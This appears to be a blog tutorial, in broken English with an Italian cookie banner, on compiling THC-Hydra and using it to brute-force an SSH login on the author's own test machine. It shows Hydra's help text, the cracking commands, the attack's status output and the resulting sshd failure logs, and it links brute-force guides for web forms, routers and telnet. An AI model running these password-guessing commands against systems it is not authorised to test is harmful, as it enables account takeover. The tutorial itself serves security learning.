Questo sito utilizza i cookie per migliorare l'esperienza di navigazione. Continuando la navigazione acconsenti all'utilizzo dei cookie.

Use The Force Luke...

Oh guys lpay attention, it's only for study purpose! you would find yourself in trouble faster than the light. 
Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. Newest version available at http://www.thc.org/thc-hydra


First of all we have  to install the software. To build it you need libssh e  libssh-dev libraries. 


$ apt-get install libssh-dev
...

Now download and build hydra :

$ mkdir hydra.src
$ cd hydra.src
$ wget "http://www.thc.org/releases/hydra-7.4.2.tar.gz"
$ tar zxvf hydra-7.4.2.tar.gz
$ cd hydra-7.4.2/
$ ./configure
$ make
$ make install

 

If everithing has gone without errors you should be able to launch hydra with h option to get some help :


$ hydra -h
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only
Options:
-R restore a previous aborted/crashed session
-S perform an SSL connect
-s PORT if the service is on a different default port, define it here
-l LOGIN or -L FILE login with LOGIN name, or load several logins from FILE
-p PASS or -P FILE try password PASS, or load several passwords from FILE
-x MIN:MAX:CHARSET password bruteforce generation, type "-x -h" to get help
-e nsr try "n" null password, "s" login as pass and/or "r" reversed login
-u loop around users, not passwords (effective! implied with -x)
-C FILE colon separated "login:pass" format, instead of -L/-P options
-M FILE list of servers to be attacked in parallel, one entry per line
-o FILE write found login/password pairs to FILE instead of stdout
-f / -F exit when a login/pass pair is found (-M: -f per host, -F global)
-t TASKS run TASKS number of connects in parallel (per host, default: 16)
-w / -W TIME waittime for responses (32s) / between connects per thread
-4 / -6 prefer IPv4 (default) or IPv6 addresses
-v / -V / -d verbose mode / show login+pass for each attempt / debug mode
-U service module usage details
server the target server (use either this OR the -M option)
service the service to crack. Supported protocols: cisco cisco-enable cvs ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql(v4) nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] rdp rexec rlogin rsh sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey teamspeak telnet[s] vmauthd vnc xmpp
OPT some service modules support additional input (-U for module help)
Use HYDRA_PROXY_HTTP/HYDRA_PROXY and HYDRA_PROXY_AUTH environment for a proxy.

Examples:
hydra -l john -p doe 192.168.0.1 ftp
hydra -L user.txt -p defaultpw -S 192.168.0.1 imap PLAIN
hydra -l admin -P pass.txt http-proxy://192.168.0.1
hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/DIGEST-MD5

A nice thing is that we have a random password generator :

$ hydra -x -h
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra bruteforce password generation option usage:

-x MIN:MAX:CHARSET

MIN is the minimum number of characters in the password
MAX is the maximum number of characters in the password
CHARSET is a specification of the characters to use in the generation
valid CHARSET values are: 'a' for lowercase letters,
'A' for uppercase letters, '1' for numbers, and for all others,
just add their real representation.

Examples:
-x 3:5:a generate passwords from length 3 to 5 with all lowercase letters
-x 5:8:A1 generate passwords from length 5 to 8 with uppercase and numbers
-x 1:3:/ generate passwords from length 1 to 3 containing only slashes
-x 5:5:/%,.- generate passwords with length 5 which consists only of /%,.-

let's try :

I add a user to my machine and set the password "test":
$ sudo useradd testuser
$ sudo passwd testuser


let's find the password :
$ hydra -l test -x 1:5:a 192.168.0.102 ssh
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-04-07 07:39:55
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 16 tasks, 1 server, 12356630 login tries (l:1/p:12356630), ~772289 tries per task
[DATA] attacking service ssh on port 22
[ERROR] ssh protocol error
[ERROR] ssh protocol error
[ERROR] ssh protocol error

OPS, that's annoying we got an error on standard output, to solve we add the -t 8 flag to limit the number of threads forked by hydra:
$ hydra -l test -x 1:5:a -t 8 192.168.0.102 ssh
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-04-07 07:41:12
[WARNING] Restorefile (./hydra.restore) from a previous session found, to prevent overwriting, you have 10 seconds to abort...
[DATA] 8 tasks, 1 server, 12356630 login tries (l:1/p:12356630), ~1544578 tries per task
[DATA] attacking service ssh on port 22
[STATUS] 194.00 tries/min, 194 tries in 00:01h, 12356436 todo in 1061:33h, 8 active
[STATUS] 190.00 tries/min, 570 tries in 00:03h, 12356060 todo in 1083:52h, 8 active
[STATUS] 197.14 tries/min, 1380 tries in 00:07h, 12355250 todo in 1044:32h, 8 active
[STATUS] 194.20 tries/min, 2913 tries in 00:15h, 12353717 todo in 1060:14h, 8 active
....


let's see what happens in the ssh daemon logs, nothing strange to say the truth, just a lot of failed authentications :
$tail -f /var/log/auth.log
Apr 7 07:40:35 debian sshd[6275]: Failed password for invalid user test from 192.168.0.102 port 59946 ssh2
Apr 7 07:40:35 debian sshd[6275]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6277]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6245]: Failed password for invalid user test from 192.168.0.102 port 59914 ssh2
Apr 7 07:40:35 debian sshd[6245]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6285]: Failed password for invalid user test from 192.168.0.102 port 59955 ssh2
Apr 7 07:40:35 debian sshd[6285]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6283]: Failed password for invalid user test from 192.168.0.102 port 59953 ssh2
Apr 7 07:40:35 debian sshd[6283]: pam_unix(sshd:auth): check pass; user unknown
Apr 7 07:40:35 debian sshd[6299]: Invalid user test from 192.168.0.102


The problem is it would take a week but time plays by your side, sooner or later hydra will find the right password.


to learn more :
General usage and options: http://www.aldeid.com/wiki/Thc-hydra

HTTP basic auth: https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29
http://www.sillychicken.co.nz/Security/how-to-brute-force-your-router-in-windows.html

HTTP form based auth: http://www.art0.org/security/performing-a-dictionary-attack-on-an-http-login-form-using-hydra
http://insidetrust.blogspot.com/2011/08/using-hydra-to-dictionary-attack-web.html
http://www.sillychicken.co.nz/Security/how-to-brute-force-http-forms-in-windows.html
https://www.owasp.org/index.php/Testing_for_Brute_Force_%28OWASP-AT-004%29

Multiple protocols: http://wiki.bywire.org/Hydra
http://www.attackvector.org/brute-force-with-thc-hydra/
http://www.madirish.net/content/hydra-brute-force-utility

Telnet: http://www.theprohack.com/2009/04/basics-of-cracking-ftp-and-telnet.html
http://www.adeptus-mechanicus.com/codex/bflog/bflog.html

 









Share